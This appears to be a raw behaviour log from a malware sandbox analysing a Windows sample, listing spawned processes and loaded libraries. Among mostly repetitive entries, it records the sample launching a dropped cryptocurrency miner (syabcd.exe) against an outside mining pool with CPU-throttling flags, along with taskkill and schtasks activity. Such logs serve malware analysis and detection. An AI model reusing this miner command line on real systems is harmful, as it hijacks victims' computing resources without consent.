Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\ProgramData\syabcd.exe C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: drprov.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: ntlanman.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: davclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
